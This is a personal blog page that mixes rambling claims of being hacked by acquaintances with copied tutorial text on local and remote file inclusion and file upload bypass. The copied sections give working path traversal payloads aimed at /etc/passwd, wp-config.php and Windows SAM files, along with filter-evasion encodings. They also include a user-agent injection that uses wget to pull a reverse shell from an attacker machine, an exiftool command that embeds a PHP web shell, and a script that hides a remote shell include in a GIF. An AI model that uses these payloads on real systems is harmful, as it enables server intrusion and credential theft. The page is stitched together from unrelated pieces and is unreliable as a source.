1.Local and remote file inclusion

I realized I was listing all of my hacking stuff that I’m finding as I keep continuing on this terrible journey and finding out who is doing this to me on my regular pages and I realize that’s probably boring it makes me look a bit nutty, so I’ve decided to compile a page to list it all here so that my normal feet can be more pleasant like I hope my normal life can grow to be again

Munki MDM.. I had this real twat of a woman staying with me last year said she needed a place to stay blah blah blah it was all a lie she didn’t really horrible things to me who was just seemingly trying to help her.. i e colon throwing my IDs out at the gas station on the floor kicking me out of a hotel room and then renting it again another night and my name and lying and saying that she went to jail dressing up as me and robbing Salvation Army boxes anyway she was always watching monkey shows; monkeys monkeys ,monkeys !! on whatever. Discovery Channel this software is the reason. Everyone that is involved /was involved in hacking me, the whole time they had to broadcast it proudly… they could not keep it secret what they were doing… they were so proud of themselves.. love to rub it in my face and make me feel stupid. I knew what they were doing and I knew it was them I just did not know how, what software they were employing, how to get around it or describe it or how to actually call and report it to real authorities anywho this is one of the stupid softwares below:

Munki vs MDM?

Munki is an open-source project that layers additional app capabilities onto the native Apple MDM protocol. Whereas MDM supports installing a subset of macOS package formats, Munki supports a much wider range of software, including the common . dmg (Apple Disk Image) format.Feb 13, 2023

http://sharevideo1.com/v/bXpJNTlDSVMxZUU=?t=ytb&f=co

Courtesy of https://vulp3cula.gitbook.io/hackers-grimoire/exploitation/web-application/lfi-rfi https://vulp3cula.gitbook.io/hackers-grimoire/exploitation/web-application/lfi-rfi

Local file inclusion (LFI) vulnerabilities allow an attacker to read local files on the web server using malicious web requests, such as:

Web configuration files
Log files
Password files
Other sensitive system data

LFI can also be used for remote code execution (RCE). In most cases, this is due to poor or missing input sanitization.

Remote file inclusions are similar, but the attacker is taking advantage of the web server’s ability to call local files, and using it to upload files from remote servers. These remote files can be malicious code that executes in the context of the web server user (e.g. www-data).

Techniques

Basic

Assuming you are on a Linux system, test if you can display /etc/passwd by moving back 5 directory levels:

http://host/?page=../../../../../etc/passwd

Even if this doesn’t work, it doesn’t mean that the website is immune to path traversal. When filtering input, developers will often prevent the use of forward slashes, but not backslashes or encoded characters.

wget

Sometimes browsers mess around with basic directory traversal sequences, but wget may work:

wget http://%5Bhost%5D/wp-content/uploads/page.php?url=../../../../../../../var/www/html/wp-config.php

Nesting traversal sequences

If the application is attempting to sanitize user input by removing traversal sequences, but does not apply this filter recursively, then it may be possible to bypass the filter by placing one sequence within another:

….//

….\/

…./\

….\\

how about that, SIS I had what I thought was a friend start calling me sis a few years ago I thought it was nice and endearing little did I know.. I mean I should have known

URL-encoded

Encoding all the slashes and dots in your path traversal could bypass input filters:

dot %2e

forward slash %2f

backslash %5c

Example:

%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%5cpasswd

Double URL-encoded

Another encoding method:

dot %252e

forward slash %252f

backslash %255c

Example:

%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd

Overlong UTF-8 encoding

You can also use the illegal Unicode payload type in Burp Intruder for this technique:

dot %c0%2e %e0%40%ae %c0ae etc.

forward slash %c0%af %e0%80%af %c0%2f etc.

backslash %c0%5c %c0%80%5c etc.

Null-byte injection

Some applications check whether the user-supplied file name ends in a particular file type or set of file types, and reject attempts to access anything else. A null byte terminator (%00 or 0x00 in hex) added to the LFI/RFI parameter will stop processing immediately, so that any bytes following it are ignored.

In the following code example, the extension .php added to the file request variable $file:

$file = $_GET[‘page’];

require_once(“/var/www/$file.php”);

Requesting /etc/passwd in this case will not work because the request becomes passwd.php resulting in a 404 error. However, if we add a null byte to the passwd file name it will terminate at the end of passwd and discard the remaining bytes:

http://website/page=../../../etc/passwd%00

proc/self/environ method

If you’re able to request /proc/self/environ using LFI, you might be able to get a shell by downloading a remote file with reverse shellcode and run it on the system (e.g. php reverse shell). You’ll need to intercept the /proc/self/environ request and replace HTTP request header User Agent with the following:

<?system(‘wget http://%5Battack machine]/reverseshell.txt -O shell.php’);?>

Then execute the shell by calling the URL where it was uploaded:

http://%5Bhost%5D/folder/shell.php

this is scary

Interesting files

If an LFI vulnerability exists, look for these files:

Linux

Linux system and user files:

/etc/passwd

/etc/shadow

/etc/issue

/etc/group

/etc/hostname

/home/user/

/home/user/.ssh

/home/user/bash_history

Log files

Potentially interesting logfiles:

/var/log/apache/access.log

/var/log/apache2/access.log

/var/log/httpd/access_log

/var/log/apache/error.log

/var/log/apache2/error.log

/var/log/httpd/error_log

CMS configuration files

If there is a web server, always check /var/www/html for interesting files, including robots.txt in the root web folder.

Content management system configuration files:

WordPress: /var/www/html/wp-config.php

Joomla: /var/www/configuration.php

Dolphin CMS: /var/www/html/inc/header.inc.php

Drupal: /var/www/html/sites/default/settings.php

Mambo: /var/www/configuration.php

PHPNuke: /var/www/config.php

PHPbb: /var/www/config.php

Windows

Files that may exist on Windows systems:

c:\WINDOWS\system32\eula.txt

c:\boot.ini

c:\WINDOWS\win.ini

c:\WINNT\win.ini

c:\WINDOWS\Repair\SAM

c:\WINDOWS\php.ini

c:\WINNT\php.ini

c:\Program Files\Apache Group\Apache\conf\httpd.conf

c:\Program Files\Apache Group\Apache2\conf\httpd.conf

c:\Program Files\xampp\apache\conf\httpd.conf

c:\php\php.ini

c:\php5\php.ini

c:\php4\php.ini

c:\apache\php\php.ini

c:\xampp\apache\bin\php.ini

c:\home2\bin\stable\apache\php.ini

c:\home\bin\stable\apache\php.ini

The system and SAM files might be in different locations. As well, the path might be case-sensitive, even though it’s Windows.

# SYSTEMROOT is usually windows

windows\repair\SAM

%SYSTEMROOT%\repair\SAM

%SYSTEMROOT%\System32\config\RegBack\SAM

%SYSTEMROOT%\System32\config\SAM

%SYSTEMROOT%\repair\system

%SYSTEMROOT%\System32\config\SYSTEM

%SYSTEMROOT%\System32\config\RegBack\system

File upload bypass

File upload mechanisms are very common on websites, but sometimes have poor validation. This allows attackers to upload malicious files to the web server, which can then be executed by other users or the server itself. This can also happen in authenticated areas of a website (e.g. installing WordPress plugins)

File extension

Developers may blacklist specific file extensions and prevent users from uploading files with extensions that are considered dangerous. This can be bypassed by using alternate extensions or even unrelated ones. For example, it might be possible to upload and execute a .php file simply by renaming it file.php.jpg or file.PHp.

Alternate extensions

Type	Extension
php	phtml, .php, .php3, .php4, .php5, and .inc
asp	asp, .aspx
perl	.pl, .pm, .cgi, .lib
jsp	.jsp, .jspx, .jsw, .jsv, and .jspf
Coldfusion	.cfm, .cfml, .cfc, .dbm

MIME type

Blacklisting MIME types is also a method of file upload validation. It may be bypassed by intercepting the POST request on the way to the server and modifying the MIME type.

Normal php MIME type:

Content-type: application/x-php

Replace with:

Content-type: image/jpeg

PHP getimagesize()

For file uploads which validate image size using php getimagesize(), it may be possible to execute shellcode by inserting it into the Comment attribute of Image properties and saving it as file.jpg.php.

You can do this with gimp or exiftools:

exiftool -Comment='<?php echo “<pre>”; system($_GET[‘cmd’]); ?>’ file.jpg

mv file.jpg file.php.jpg

I’m not sure why some tutorials have the php extension first while others have it second. Try both.

GIF89a; header

GIF89a is a GIF file header. If uploaded content is being scanned, sometimes the check can be fooled by putting this header item at the top of shellcode:

GIF89a;

system($_GET[‘cmd’]); # shellcode goes here

Because malicious PHP code can be uploaded for a website as a JPG or GIf file through insecure upload forms, most upload forms don’t check the file extension, but check the content of the file, or check the content of the file and the extension. In that kind of situations a PHP code cannot be uploaded as a image file.

Let’s say there is a upload form that doesn’t check the file extension but checks the contents of the file. It’s secure than just checking the extension of the file. So a hacker can overcome this by injecting malicious PHP code to a valid image file, and upload it as PHP. Which I’m going to talk about now.

There are few ways to add PHP code to a image file, one way is to add the PHP code to the EXITE meta data of the image by simply downloading an EXIF editor, or using a software like GIMP to add the php code to the comment section of the image, or using a HEX editor.

But, there is more simpler way to do it. First make a simple white GIF file, JPG will do too. Make sure it’s white, I’ve used other images but sometimes it give errors in PHP because of the characters of the image code.

Make a small PHP file, make sure the code is small because sometimes it might give a PHP error too if it’s too long because we are injecting this to a valid image file, this code will do.

<?php
include ("http://example.com/shell.php");
?>

Save this as a PHP file.

Then make this small piece of python code,

lavender = open ('msgif.gif','rb').read()
lavender += open ('test.php','rb').read()
open ('newphp.php','wb').write(lavender)

Run the python script and the PHP the end result will be a valid image file with malicious PHP code in it, with PHP extension.

And you can upload this to a an upload form that check the contents of an file and not the extension of the file. These forms most of the time check the header of the file (sometimes the header and the width of and height of the image) and does not check the extension because checking the contents of the file is better than just checking the extension and because of this the file can be uploaded as a PHP file. And typing the URL of of the file will execute the PHP code and leaving out the JPG or GIF code. The remote shell will be called and because PHP code executes on the server the remote shell will be executed on the server that has the malicious image.

For upload forms that check both the extension and the content of the file, the malicious image that we made can be renamed as GIF or JPG and can be uploaded to the website, and it can be executed just like a PHP file with an image extension like I talked in my previous 2 posts.

Sometimes websites check for the size of the image with the PHP get image size function, so the if the image is too small it will be not allowed to be uploaded. But if we make a bigger white image it will most probably allow the file to be uploaded.

This can be overcome by forms by not just uploading the file, but recreating image on the server using PHP create image function, or removing the metadata of the image before uploading as well.

I think this brings a wrap to injection malicious PHP code to an image, I’ll write a post if I have anything more to add.

Credits : Sam Bowne, LeRes

Posted 18th July 2012 by Unknown

Labels: Hacking Infosec Malicious PHP In Images Malware PHP

Credit: http://www.techyzilla.com